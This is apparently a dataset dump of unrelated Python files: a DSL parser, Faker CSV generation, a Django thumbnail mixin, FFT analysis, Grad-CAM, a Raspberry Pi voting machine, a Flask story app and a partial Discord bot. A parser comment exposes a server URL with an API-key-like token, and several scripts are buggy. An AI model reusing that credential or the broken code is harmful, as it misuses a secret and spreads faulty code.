pick a number between 1 and 100!\")\n\tans = int(raw_input())\n\tassert 0>')\n if contents in words:\n print('Freedom')\n else:\n print('Human Rights')\n\nif __name__ == '__main__':\n inputGame()","sub_path":"elevn.py","file_name":"elevn.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"114649356","text":"from sys import stdin, stdout, stderr, argv, exit\nimport os\nimport json\nimport sys\n\nimport code\n\nfrom pyparsing import *\n\nfrom .grammar import PythonGrammar\nfrom .context import Context\nfrom .interpreter import Interpreter\nfrom .pygen import CodeGenerator\n \nclass PhenoWLParser(object):\n '''\n The parser for PhenoWL DSL.\n '''\n\n def __init__(self, grammar = None):\n self.grammar = grammar if grammar else PhenoWLGrammar()\n self.tokens = ParseResults()\n self.err = []\n \n def error(self, *args):\n self.err.append(\"{0}\".format(', '.join(map(str, args))))\n\n def parse(self, text):\n try:\n self.tokens = self.grammar.program.ignore(pythonStyleComment).parseString(text, parseAll=True)\n return self.tokens\n except ParseException as err:\n print(err)\n self.error(err)\n except Exception as err:\n print(err)\n self.error(err)\n \n def parse_subgrammar(self, subgrammer, text):\n try:\n self.tokens = subgrammer.ignore(pythonStyleComment).parseString(text, parseAll=True)\n return self.tokens\n except ParseException as err:\n print(err)\n self.error(err)\n except Exception as err:\n print(err)\n self.error(err)\n\n def parse_file(self, filename):\n try:\n self.tokens = self.grammar.program.ignore(pythonStyleComment).parseFile(filename, parseAll=True)\n return self.tokens\n except ParseException as err:\n print(err)\n exit(3)\n except Exception as err:\n print(err)\n self.error(err)\n \nif __name__ == \"__main__\":\n from ..timer import Timer\n with Timer() as t:\n p = PhenoWLParser(PythonGrammar())\n if len(sys.argv) > 1:\n tokens = p.parse_file(sys.argv[1])\n else:\n test_program_example = \"\"\"\n#shippi.RegisterImage('127.0.0.1', 'phenodoop', 'sr-hadoop', '/home/phenodoop/phenowl/storage/images', '/home/phenodoop/phenowl/storage/output')\n# GetFolders('/')\n# CreateFolder('/images/img') \n# x = 10\n# y = 10\n# z = 30\n# for k in range(1,10):\n# p =30\n# q = 40\n# if x <= 20:\n# r = 40\n# s = 50\n# if y >= 10:\n# t = 60\n# s = 70\n# print(z)\n# if p < q:\n# print(p + 5)\n\n# task sparktest(s, u, p):\n# GetTools()\n# sparktest('server', 'user', 'password')\n\n# parallel:\n# x = 10\n# q = x\n# print(q)\n# with:\n# y = 20\n# p = y\n# print(p)\n \n# task ('http://sr-p2irc-big8.usask.ca:8080', '7483fa940d53add053903042c39f853a'):\n# ws = GetHistoryIDs()\n# print(len(ws))\n# l = len(ws)\n# if l > 0:\n# print(ws[0])\n# w = GetHistory(ws[0])\n# r = Upload(w['id'], '/home/phenodoop/phenowl/storage/texts/test.txt')\n# print(r)\n #print(w)\n #print(len(w))\n #print(w)\n #print(w['name'])\n\n#result = SearchEntrez(\"Myb AND txid3702[ORGN] AND 0:6000[SLEN]\", \"nucleotide\")\n#print(result)\n\n# s = 10\n# t = \"15\" + \"16\"\n# print(t)\n\n# task ('http://sr-p2irc-big8.usask.ca:8080', '7483fa940d53add053903042c39f853a'):\n# history_id = CreateHistory('Galaxy Pipeline')\n# dataset_id = FtpToHistory('ftp://ftp.sra.ebi.ac.uk/vol1/fastq/SRR034/SRR034608/SRR034608.fastq.gz', history_id)\n# tool_id = ToolNameToID('FASTQ Groomer')\n# ref_dataset_id = HttpToHistory('http://rice.plantbiology.msu.edu/pub/data/Eukaryotic_Projects/o_sativa/annotation_dbs/pseudomolecules/version_6.1/all.dir/all.cDNA.gz', 
history_id)\n# params = \"name:\" + ref_dataset_id\n# r = RunTool(history_id, tool_id, params)\n# \n# output = r['name']\n# print(output)\n\n\n\n#x[0] = 5*4\n#z = x[0] \n#y = 50 + z\n# a = {3: {'t':'ss'}, 4:11}\n# y = a[3]\n# x = []\n# x[0] = 20\n# y = 5 + (x[0])\n# print(y)\n\n# f = FastQC('fastq\\SRR034608.fastq.gz')\n# print(f)\n\n# parallel:\n# print(10)\n# with:\n# print(11)\n\nref_dataset_name = 100\n#params = [ref_dataset_name, 50]\n# { 'name': ref_dataset_name }\n#params = [{ 'name': ref_dataset_name }, { 'name': [20 * 30] }] \n#params = { 'name': ref_dataset_name }\n\n params = {\"fastq_R1\": {\"values\":[{\"src\":\"hda\", \"id\":\"9ac6c47a8515c831\"}]}, \"fastq_R2\":{\"values\":[{\"src\":\"hda\",\"id\":\"6dbc21d257b88b00\"}]}}\n \nprint(params = 'xt')\n\n \"\"\"\n tokens = p.parse(test_program_example)\n #tokens = p.grammar.assignstmt.ignore(pythonStyleComment).parseString(test_program_example)\n \n tokens.pprint()\n #print(tokens.asXML())\n integrator = PhenoWLInterpreter()\n # integrator = PhenoWLCodeGenerator()\n \n integrator.context.load_library(\"libraries\")\n integrator.run(tokens)\n print(integrator.context.library)\n print(integrator.context.out)\n print(integrator.context.err)\n #print(integrator.code)\n","sub_path":"app/biowl/dsl/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"394476952","text":"from faker import Faker\nfake = Faker()\nimport random\nbuildingtype = ['mansion', 'apartment', 'castle', 'house', 'flat', 'stable']\nimport csv\n\nrecords = []\n\nfor i in range(7):\n record = {'name': f'{fake.color_name()} Mansion', 'address': f'{fake.street_address()}', 'city': f'{fake.city()}', 'zip code': f'{fake.postcode()}', 'building type': f'{random.choice(buildingtype)}', 'lease price': f'{fake.random_int(min=100, max=999, step=1)} $'}\n records.append(record)\n\nfor r in records:\n print(r.get(\"name\"))\n\nwith open(\"todo.pickle\", 'wb') as f:\n pickle.dump(records, f)\n\nwith open(\"todo.pickle\", \"rb\") as f:\n rec = pickle.load(f)\nprint(rec)\n\nfalsedate = fake.date(pattern='%Y-%m-%d', end_datetime=None)\nprint(falsedate)\n\nprint(records[5])\nwith open(f'properties1.csv', 'w', newline='') as csvfile:\n fieldnames = ['name', 'address', 'city', 'zip code', 'building type', 'lease price']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n \n writer.writeheader()\n for r in records:\n if r != records[4]:\n writer.writerow(r)\n\nwith open('properties1.csv', newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n print(row['name'], row['lease price'], row['city'])\n\nwith open(f'properties2.csv', 'w', newline='') as csvfile:\n fieldnames = ['name', 'address', 'city', 'zip code', 'building type', 'lease price']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n \n writer.writeheader()\n for r in records:\n if r != records[3]:\n writer.writerow(r)\n\nwith open(f'properties3.csv', 'w', newline='') as csvfile:\n fieldnames = ['name', 'address', 'city', 'zip code', 'building type', 'lease price']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n \n writer.writeheader()\n for r in records:\n if r == records[5]:\n r['city'] = f'{fake.city()}'\n writer.writerow(r)\n else:\n writer.writerow(r)\n\nwith open(f'properties4.csv', 'w', newline='') as csvfile:\n fieldnames = ['name', 'address', 'city', 'zip code', 'building type', 'lease price']\n writer = csv.DictWriter(csvfile, 
fieldnames=fieldnames)\n    \n    writer.writeheader()\n    for r in records:\n        if r != records[5]:\n            if r == records[2]:\n                r['lease price'] = f'{fake.random_int(min=100, max=999, step=1)} $'\n                writer.writerow(r)\n            else:\n                writer.writerow(r)\n    \n\n\n","sub_path":"zapisproperties.py","file_name":"zapisproperties.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"463293622","text":"from django.conf import settings\nfrom django.db import models\nfrom django.db.models.fields.files import ImageFieldFile\nfrom django.utils.html import format_html\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom easy_thumbnails.exceptions import EasyThumbnailsError\nfrom easy_thumbnails.files import get_thumbnailer\n\n\nclass ImageMixin(models.Model):\n    image_field = 'image'\n    image_size = (70, 40)\n\n    def image_thumb(self):\n        image = getattr(self, self.image_field)\n        if image and not isinstance(image, ImageFieldFile):\n            return format_html('\"\"' % (\n                image.url, self.image_size[0], self.image_size[1]\n            ))\n        else:\n            try:\n                return format_html(\n                    '\"\"' % get_thumbnailer(\n                        getattr(self, self.image_field)\n                    ).get_thumbnail({\n                        'size': self.image_size,\n                        'detail': True,\n                    }).url if image else '\"\"' % (\n                        settings.STATIC_URL, self.image_size[0], self.image_size[1]\n                    )\n                )\n            except (OSError, EasyThumbnailsError):\n                return ''\n\n    image_thumb.short_description = _('Image')\n\n    class Meta:\n        abstract = True\n","sub_path":"snippets/models/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"192236241","text":"# Const\nN = 1024 * 2**8\ndelta_T = 1/1000\n\nA0 = 2\nA1 = 3\nA2 = 100\n\nf0 = 153.6849819\nf1 = 204.1683416\nf2 = 249.83384134\n\ndef calculate_phase_spectrum(complex_spectrum):\n    \"\"\"\n    :complex_spectrum: complex spectrum of the signal\n    :returns: phase spectrum of the signal\n    \"\"\"\n    import cmath as cm\n\n    phase_spectrum = []\n    for scalar in complex_spectrum:\n        phase_spectrum.append(cm.phase(scalar))\n\n    return phase_spectrum\n\ndef low_resolution_window_function(step_number):\n    \"\"\"\n    :step_number: number of samples\n    :returns: low-resolution window \n    \"\"\"\n    import numpy as np\n\n    low_resolution_window = []\n    for n in range(0, step_number):\n        low_resolution_window.append(np.exp(-(1/2) * ((n - (N/2))/(0.5 * (N/2)))**2))\n    \n    return low_resolution_window\n\ndef high_resolution_window_function(step_number):\n    \"\"\"\n    :step_number: number of samples\n    :returns: high-resolution window\n    \"\"\"\n    import numpy as np\n\n    high_resolution_window = []\n    for n in range(0, step_number):\n        high_resolution_window.append(np.sin((np.pi * n)/N))\n\n    return high_resolution_window\n\ndef signal_plot(input_signal):\n    \"\"\"\n    Plots the signal and computes its spectra with the given window functions\n\n    :input_signal: input signal (discrete)\n    \"\"\"\n    import numpy as np\n    import cmath as cm\n    import matplotlib.pyplot as plt\n    import scipy.fftpack as fp\n    from scipy.signal import find_peaks\n\n    # Compute the frequencies\n    k = np.linspace(0, N/2, N/2)\n    frequency = k/(N * delta_T)\n\n    # Plot the sampled signal\n    signal_window = plt.figure()\n    signal_ax = signal_window.add_subplot(111)\n    signal_ax.plot(range(0, len(input_signal)), input_signal)\n    signal_ax.set_title(\"Sampled signal\")\n    signal_ax.set_xlabel(\"Frequency, Hz\")\n    signal_ax.set_ylabel(\"Amplitude, 
V\")\n\n    # Compute the amplitude spectrum from the FFT of the signal and plot it\n    fft_sd = fp.fft(input_signal)\n    fft_spectrum_window = plt.figure()\n    fft_amplitude_spectrum_ax = fft_spectrum_window.add_subplot(211)\n    fft_amplitude_spectrum_ax.set_xscale('log')\n    fft_amplitude_spectrum_ax.plot(frequency, 20 * np.log10(abs(fft_sd[:len(k)])))\n    fft_amplitude_spectrum_ax.set_title(\"Amplitude spectrum of the signal\")\n    fft_amplitude_spectrum_ax.set_xlabel(\"Frequency, Hz\")\n    fft_amplitude_spectrum_ax.set_ylabel(\"Amplitude, V\")\n    print(frequency[find_peaks(abs(fft_sd[:len(k)]))[0][:]])\n    print(frequency[1]-frequency[0])\n    \n    # Compute the phase spectrum from the FFT of the signal and plot it\n    fft_phase_spectrum = calculate_phase_spectrum(fft_sd)\n    fft_phase_spectrum_ax = fft_spectrum_window.add_subplot(212)\n    fft_phase_spectrum_ax.plot(frequency, fft_phase_spectrum[:len(k)])\n    fft_phase_spectrum_ax.set_title(\"Phase spectrum of the signal\")\n    fft_phase_spectrum_ax.set_xlabel(\"Frequency, Hz\")\n    fft_phase_spectrum_ax.set_ylabel(\"Phase, rad\")\n\n    # Compute the amplitude spectrum of the signal with the low-resolution window function applied and plot it\n    lrw = low_resolution_window_function(N)\n    low_res_win_spectrum_window = plt.figure()\n    low_res_win_amplitude_spectrum_ax = low_res_win_spectrum_window.add_subplot(211)\n    low_res_win_amplitude_spectrum_ax.set_xscale('log')\n    low_res_win_amplitude_spectrum_ax.plot(frequency, 20 * np.log10((abs(fp.fft(lrw * input_signal)))[:len(k)]))\n    low_res_win_amplitude_spectrum_ax.set_title(\"Amplitude spectrum of the signal\")\n    low_res_win_amplitude_spectrum_ax.set_xlabel(\"Frequency, Hz\")\n    low_res_win_amplitude_spectrum_ax.set_ylabel(\"Amplitude, V\")\n\n    # Compute the phase spectrum of the signal with the low-resolution window function applied and plot it\n    low_res_win_phase_spectrum = calculate_phase_spectrum(fp.fft(lrw * input_signal))\n    low_res_win_phase_spectrum_ax = low_res_win_spectrum_window.add_subplot(212)\n    low_res_win_phase_spectrum_ax.plot(frequency, low_res_win_phase_spectrum[:len(k)])\n    low_res_win_phase_spectrum_ax.set_title(\"Phase spectrum of the signal\")\n    low_res_win_phase_spectrum_ax.set_xlabel(\"Frequency, Hz\")\n    low_res_win_phase_spectrum_ax.set_ylabel(\"Phase, rad\")\n\n    # Compute the amplitude spectrum of the signal with the high-resolution window function applied and plot it\n    hrw = high_resolution_window_function(N)\n    high_res_win_spectrum_window = plt.figure()\n    high_res_win_amplitude_spectrum_ax = high_res_win_spectrum_window.add_subplot(211)\n    high_res_win_amplitude_spectrum_ax.set_xscale('log')\n    high_res_win_amplitude_spectrum_ax.plot(frequency, 20 * np.log10((abs(fp.fft(hrw * input_signal)))[:len(k)]))\n    high_res_win_amplitude_spectrum_ax.set_title(\"Amplitude spectrum of the signal\")\n    high_res_win_amplitude_spectrum_ax.set_xlabel(\"Frequency, Hz\")\n    high_res_win_amplitude_spectrum_ax.set_ylabel(\"Amplitude, V\")\n\n    # Compute the phase spectrum of the signal with the high-resolution window function applied and plot it\n    high_res_win_phase_spectrum = calculate_phase_spectrum(fp.fft(hrw * input_signal))\n    high_res_win_phase_spectrum_ax = high_res_win_spectrum_window.add_subplot(212)\n    high_res_win_phase_spectrum_ax.plot(frequency, high_res_win_phase_spectrum[:len(k)])\n    high_res_win_phase_spectrum_ax.set_title(\"Phase spectrum of the signal\")\n    high_res_win_phase_spectrum_ax.set_xlabel(\"Frequency, Hz\")\n    high_res_win_phase_spectrum_ax.set_ylabel(\"Phase, rad\")\n\n    # Add spacing between the plots\n    signal_window.tight_layout()\n    fft_spectrum_window.tight_layout()\n    
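# (each of the four figures needs its own tight_layout call, so that the stacked amplitude/phase subplots keep their titles and axis labels from overlapping)\n    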
low_res_win_spectrum_window.tight_layout()\n high_res_win_spectrum_window.tight_layout()\n\ndef signal(time):\n \"\"\" \n Генерирует сигнал с заданными параметрами\n\n :time: отсчёты по х-оси\n :returns: сигнал с заданными параметрами\n \"\"\"\n import numpy as np\n\n input_signal = A0 * np.sin(2 * np.pi * f0 * time + 2*np.pi/3) + A1 * np.sin(2 * np.pi * f1 * time + np.pi/3) + A2 * np.sin(2 * np.pi * f2 * time + np.pi/4)\n\n return input_signal \n\ndef main():\n import numpy as np\n import matplotlib.pyplot as plt\n\n n = np.linspace(0, N - 1, N)\n sd = signal(n * delta_T) \n\n signal_plot(sd)\n #signal_plot(sd + np.random.normal(0.05, 0.05, len(sd)))\n\n plt.show()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"MetUstrCifrObr/1sem/practika/prac2/prac2_for_play.py","file_name":"prac2_for_play.py","file_ext":"py","file_size_in_byte":7312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"264604292","text":"import chainer\nimport chainer.links as L\nimport chainer.functions as F\nimport numpy as np\nimport cv2\n\nfrom src.utils.datasets import ImageNetClassID\n\n\ndef get_heatmap(model, image, classids, rank=0):\n with chainer.using_config('train', False):\n pred = model.prepare_cam(image)\n target_class = np.argsort(F.softmax(pred)[0].array)[::-1][rank]\n signal = np.zeros_like(pred).astype('f')\n signal[0, target_class] = 1\n pred.grad = signal\n pred.backward()\n\n map_weights = _global_average_pooling_2d(model.target.grad)\n activations = model.target\n\n grad_cams = map_weights * activations\n grad_cam = F.relu(F.sum(grad_cams, axis=1))[0]\n grad_cam = cv2.resize(grad_cam.array, image.shape[2:])\n heatmap = (grad_cam / np.max(grad_cam)) * 255\n heatmap = cv2.applyColorMap(np.uint8(heatmap), cv2.COLORMAP_JET)[:, :, ::-1]\n\n return heatmap, classids[target_class]\n\n\ndef get_heatmap_imagenet(model, image, classids=ImageNetClassID, rank=0):\n x = L.model.vision.vgg.prepare(image)\n x = chainer.Variable(np.array([x]).astype('f'))\n return get_heatmap(model, x, classids=ImageNetClassID, rank=0)\n\n\ndef _global_average_pooling_2d(maps):\n return F.average_pooling_2d(maps, maps.shape[2:])\n","sub_path":"src/utils/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"474902386","text":"import RPi.GPIO as GPIO\nfrom gpiozero import LED\nimport time\nGPIO.setmode(GPIO.BCM)\n\nstate = 0\nno_of_pos = 0\npos = {}\nlight1 =18\nlight2 = 22\nlight3 = 23\nstart_button = 4\nresult_button = 20\nbutton1 = 6\nbutton2 = 12\nbutton3 = 13\n\nGPIO.setup(light1,GPIO.OUT)\nGPIO.setup(light2,GPIO.OUT)\nGPIO.setup(light3,GPIO.OUT)\nGPIO.setup(start_button,GPIO.IN,pull_up_down=GPIO.PUD_UP)\nGPIO.setup(result_button,GPIO.IN,pull_up_down=GPIO.PUD_UP)\nGPIO.setup(button1,GPIO.IN,pull_up_down=GPIO.PUD_UP)\nGPIO.setup(button2,GPIO.IN,pull_up_down=GPIO.PUD_UP)\nGPIO.setup(button3,GPIO.IN,pull_up_down=GPIO.PUD_UP)\n\ndef showLight(st): \n if st == 0:\n GPIO.output(light1,GPIO.LOW)\n GPIO.output(light2,GPIO.LOW)\n GPIO.output(light3,GPIO.LOW)\n \n elif st == 1:\n GPIO.output(light1,GPIO.HIGH)\n GPIO.output(light2,GPIO.HIGH)\n GPIO.output(light3,GPIO.HIGH)\n \n\ndef setupMachine():\n global state\n\n no_of_pos = int(raw_input(\"Enter no. of positions:\"))\n for i in range(no_of_pos):\n name = raw_input(\"Enter position name (max 12 char long):\")\n can = int(raw_input(\"Enter no. 
of candidates:\"))\n can_list = {}\n for j in range(can):\n can_name = raw_input(\"Enter name of candidate no. \" + str(j + 1) + \":\")\n can_list[j] = can_name\n pos[name] = can_list \n state = 1\n print(state)\n print(\"Setup successful\")\n \n# NOTE: setText(...) below is assumed to be provided by an attached LCD/display driver; it is not defined in this file.\nclass startForOnePerson:\n def __init__(self):\n print (\"starting...\")\n self.setText(\"Starting...\")\n time.sleep (1)\n \n for pos_name, can_list in pos.iteritems():\n #print position name in first row\n line1 = \"\"\n line2 = \"\"\n line3 = \"\"\n \n line1 += pos_name \n #print candidates in second row\n for can in can_list.keys():\n line2 += can + \" \"\n self.setText(line1 + \"\\n\" + line2 + \"\\n\" + line3)\n time.sleep(0.5)\n\n showLight(1)\n while True:\n input1 = GPIO.input(button1)\n input2 = GPIO.input(button2)\n input3 = GPIO.input(button3)\n\n if input1 == False:\n pos[pos_name][can_list.keys()[0]] += 1\n line1 += \" \" + can_list.keys()[0]\n time.sleep(2)\n print(\"vote to 1\")\n break\n elif input2 == False:\n pos[pos_name][can_list.keys()[1]] += 1\n line1 += \" \" + can_list.keys()[1]\n time.sleep(2)\n print(\"vote to 2\")\n break\n setText(line1 + \"\\n\" + line2)\n showLight(0) \n time.sleep(2) \n print (\"vote recorded\")\n\ndef printResult():\n print (\"Showing result:\")\n\n line1 = \"Showing result\" \n for pos_name, can_list in pos.iteritems():\n mx = -1\n line2 = \"\"\n for x , y in can_list.iteritems():\n if y > mx:\n mx=y\n for x , y in can_list.iteritems():\n if y == mx:\n line2 += x + \" \"\n setText(line1 + \"\\n\" + line2)\n time.sleep(3)\n \ndef startMachine():\n global state\n while True:\n start = GPIO.input(start_button)\n res = GPIO.input(result_button)\n if start == False:\n time.sleep(2)\n if state == 0: \n setupMachine()\n print(state)\n elif state == 1:\n startForOnePerson()\n \n elif res == False:\n time.sleep(2)\n printResult()\n break\n \n \n \nsetupMachine()\nstartMachine()\n","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"410280769","text":"import openpyxl\nwb = openpyxl.Workbook()\nsheet = wb.active\n# sheet['A1'] = 200\n# sheet['A2'] = 300\n# sheet['A3'] = '=SUM(A1:A2)'\n\nsheet['C1'] = \"Tall row\"\nsheet['D1'] = 'Wide column'\n\nsheet.row_dimensions[1].height = 70\nsheet.column_dimensions['D'].width = 20\n\n# wb.save(\"writeFormula.xlsx\")\nwb.save(\"dimensions.xlsx\")","sub_path":"work_with_excel_sheet/write_formula.py","file_name":"write_formula.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"623874362","text":"\n# array = [1, 3, 5, 7, 9]\n# for x in array:\n# print(x)\n# for (i, x) in enumerate(array):\n# print(i, x)\n\ncounter = 100\nwhile counter > 10:\n print(counter)\n counter = counter - 1\n\n","sub_path":"test04_loop.py","file_name":"test04_loop.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"73143408","text":"from __future__ import print_function\r\n\r\nfrom sys import stderr\r\n\r\n__authors__ = ['Khyber Sen', 'Caleb Smith-Salzburg', 'Michael Ruvinshteyn', 'Terry Guan']\r\n__date__ = '2017-10-30'\r\n\r\nfrom typing import Callable\r\nimport os\r\n\r\nfrom flask import \\\r\n Flask, \\\r\n render_template, \\\r\n request, \\\r\n flash, \\\r\n session, \\\r\n Response\r\n\r\nfrom werkzeug.datastructures import ImmutableMultiDict\r\n\r\nfrom 
util.flask_utils_types import \\\r\n Router, \\\r\n Precondition\r\n\r\nfrom util.flask_utils import \\\r\n preconditions, \\\r\n post_only, \\\r\n reroute_to, \\\r\n form_contains, \\\r\n session_contains, \\\r\n bind_args\r\n\r\nfrom util.template_context import add_template_context\r\nfrom util.flask_json import use_named_tuple_json\r\n\r\nfrom storytelling_db import \\\r\n StoryTellingDatabase, \\\r\n User, \\\r\n Story, \\\r\n Edit, \\\r\n StoryTellingException\r\n\r\napp = Flask(__name__)\r\n\r\ndb = StoryTellingDatabase()\r\n\r\n\"\"\"Keys in session.\"\"\"\r\nUSER_KEY = 'user'\r\nSTORY_KEY = 'story'\r\nEDIT_KEY = 'edit'\r\nIS_NEW_STORY_KEY = 'is_new_story'\r\n\r\n\r\ndef get_user():\r\n # type: () -> User\r\n \"\"\"Get User in session.\"\"\"\r\n return session[USER_KEY]\r\n\r\n\r\ndef get_story():\r\n # type: () -> Story\r\n \"\"\"Get Story in session.\"\"\"\r\n return session[STORY_KEY]\r\n\r\n\r\ndef pop_is_new_story():\r\n # type: () -> bool\r\n \"\"\"Pop is new story from session.\"\"\"\r\n return session.pop(IS_NEW_STORY_KEY)\r\n\r\n\r\ndef pop_story():\r\n # type: () -> Story\r\n \"\"\"Pop Story from session.\"\"\"\r\n return session.pop(STORY_KEY)\r\n\r\n\r\ndef pop_edit():\r\n # type: () -> Edit\r\n \"\"\"Pop Edit from session.\"\"\"\r\n return session.pop(EDIT_KEY)\r\n\r\n\r\nis_logged_in = session_contains(USER_KEY) # type: Precondition\r\nis_logged_in.func_name = 'is_logged_in'\r\n\r\n\r\n@app.reroute_from('/')\r\n@app.route('/welcome')\r\ndef welcome():\r\n # type: () -> Response\r\n return render_template('welcome.jinja2', is_loggin_in=is_logged_in())\r\n\r\n\r\ndef get_user_info():\r\n # type: () -> (str, str)\r\n \"\"\"Get username and password from request.form.\"\"\"\r\n form = request.form # type: ImmutableMultiDict\r\n return form['username'], form['password']\r\n\r\n\r\n@app.route('/login')\r\ndef login():\r\n # type: () -> Response\r\n if is_logged_in():\r\n return reroute_to(home)\r\n return render_template('login.jinja2')\r\n\r\n\r\n@preconditions(login, post_only, form_contains('username', 'password'))\r\ndef auth_or_signup(db_user_supplier):\r\n # type: (Callable[[unicode, unicode], User]) -> Response\r\n if is_logged_in():\r\n return reroute_to(home)\r\n username, password = get_user_info()\r\n with db:\r\n try:\r\n user = db_user_supplier(username, password)\r\n except StoryTellingException as e:\r\n flash(e.message)\r\n print(e, file=stderr)\r\n return reroute_to(login)\r\n\r\n session[USER_KEY] = user\r\n return reroute_to(home)\r\n\r\n\r\n@app.route('/signup', methods=['get', 'post'])\r\ndef signup():\r\n # type: () -> Response\r\n return auth_or_signup(db.add_user)\r\n\r\n\r\n\"\"\"Precondition decorator rerouting to login if is_logged_in isn't True.\"\"\"\r\nlogged_in = preconditions(login, is_logged_in) # type: Router\r\n\r\n\r\n@app.route('/auth', methods=['get', 'post'])\r\ndef auth():\r\n # type: () -> Response\r\n \"\"\"\r\n Authorize and login a User with username and password from POST form.\r\n If username and password is wrong, flash message raised by db.\r\n \"\"\"\r\n return auth_or_signup(db.get_user)\r\n\r\n\r\n@app.route('/home')\r\n@logged_in\r\ndef home():\r\n # type: () -> Response\r\n \"\"\"Display a User's home page with all of his edited and unedited Stories.\"\"\"\r\n user = get_user()\r\n with db:\r\n return render_template('home.jinja2',\r\n user=user,\r\n edited_stories=sorted(db.get_edited_stories(user)),\r\n unedited_stories=sorted(db.get_unedited_stories(user)),\r\n )\r\n\r\n\r\n@app.route('/story', 
methods=['get', 'post'])\r\n@logged_in\r\n@preconditions(home, post_only, form_contains('story'))\r\ndef read_or_edit_story():\r\n # type: () -> Response\r\n \"\"\"\r\n Open Story specified through form for either reading or editing,\r\n depending on if the User has edited the Story yet.\r\n\r\n If the story_id, storyname pair cannot be verified,\r\n reroute to home.\r\n \"\"\"\r\n storyname = request.form['story']\r\n\r\n with db:\r\n try:\r\n story = db.get_story(storyname)\r\n except StoryTellingException as e:\r\n flash(e.message)\r\n print(e, file=stderr)\r\n return reroute_to(home)\r\n\r\n session[STORY_KEY] = story\r\n editing = db.can_edit(story, get_user())\r\n if editing:\r\n return render_template('edit_story.jinja2',\r\n last_edit=db.get_last_edit(story))\r\n else:\r\n return render_template('read_story.jinja2',\r\n edits=sorted(db.get_edits(story), key=Edit.order))\r\n\r\n\r\n@app.route('/edit', methods=['get', 'post'])\r\n@logged_in\r\n@preconditions(read_or_edit_story, post_only,\r\n session_contains(STORY_KEY), form_contains('text'))\r\ndef edit_story():\r\n # type: () -> Response\r\n \"\"\"\r\n Edit the Story the User already selected with the text passed through the POST form.\r\n Reroute to edited_story to display post-edit page, passing Edit and not is_new_story.\r\n\r\n Check again if User can edit the Story. If not, reroute to home.\r\n \"\"\"\r\n\r\n story = get_story()\r\n user = get_user()\r\n\r\n with db:\r\n if not db.can_edit(story, user):\r\n return reroute_to(home)\r\n\r\n text = request.form['text']\r\n with db:\r\n edit = db.edit_story(story, user, text)\r\n return reroute_to(edited_story, pop_story(), edit, False)\r\n\r\n\r\n@app.route('/create_new_story')\r\n@logged_in\r\ndef create_new_story():\r\n # type: () -> Response\r\n return render_template('create_new_story.jinja2')\r\n\r\n\r\n@app.route('/new_story', methods=['get', 'post'])\r\n@logged_in\r\n@preconditions(create_new_story, post_only, form_contains('storyname', 'text'))\r\ndef add_new_story():\r\n # type: () -> Response\r\n \"\"\"\r\n Add the new Story created by the User\r\n with the storyname and initial text passed through the POST form.\r\n Reroute to edited_story to display post-creation page\r\n with Story, Edit, and is_new_story passed through session.\r\n\r\n If storyname already exists, reroute to create_new_story with flash.\r\n \"\"\"\r\n\r\n storyname = request.form['storyname']\r\n\r\n with db:\r\n if db.story_exists(storyname):\r\n flash('The story \"{}\" already exists'.format(storyname))\r\n return reroute_to(create_new_story)\r\n\r\n text = request.form['text']\r\n with db:\r\n story, edit = db.add_story(storyname, get_user(), text)\r\n\r\n return reroute_to(edited_story, story, edit, True)\r\n\r\n\r\n@app.route('/edited_story', methods=['get', 'post'])\r\n@logged_in\r\n@preconditions(home, lambda: False)\r\n@bind_args(home)\r\ndef edited_story(story, edit, is_new_story):\r\n # type: (Story, Edit, bool) -> Response\r\n \"\"\"Display post-edit or post-creation page for given Story, Edit, and is_new_story.\"\"\"\r\n return render_template('edited_story.jinja2',\r\n story=story,\r\n edit=edit,\r\n is_new_story=is_new_story)\r\n\r\n\r\n@app.route('/logout')\r\ndef logout():\r\n # type: () -> Response\r\n del session[USER_KEY]\r\n return reroute_to(welcome)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.debug = True\r\n app.secret_key = os.urandom(32)\r\n add_template_context(app)\r\n use_named_tuple_json(app)\r\n 
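# os.urandom(32) yields a fresh secret key on every start, so saved sessions are invalidated whenever the server restarts.\r\n 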
app.run()\r\n","sub_path":"StoryTellingGame/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"455792088","text":"import asyncio\n\nimport discord\n\nfrom commands import _mongoFunctions, _embedMessage, _util\n\n# How long to wait for user response before timeout\nwait_timeout = 60.0\n\n\nasync def setup_announcement(ctx: discord.Message, client: discord.Client):\n stop_embed = _embedMessage.create(\"SetupAnnouncement Reply\", \"Setup Stopped\", \"green\")\n\n # Checks if user is admin or bot owner\n if not (ctx.author.guild_permissions.administrator or _util.author_is_bot_owner(ctx)):\n await ctx.channel.send(embed = _embedMessage.create(\"SetupAnnouncement Reply\", \"Invalid Permissions\", \"red\"))\n return\n\n try:\n _mongoFunctions.get_guilds_information()[str(ctx.guild.id)]\n except KeyError:\n 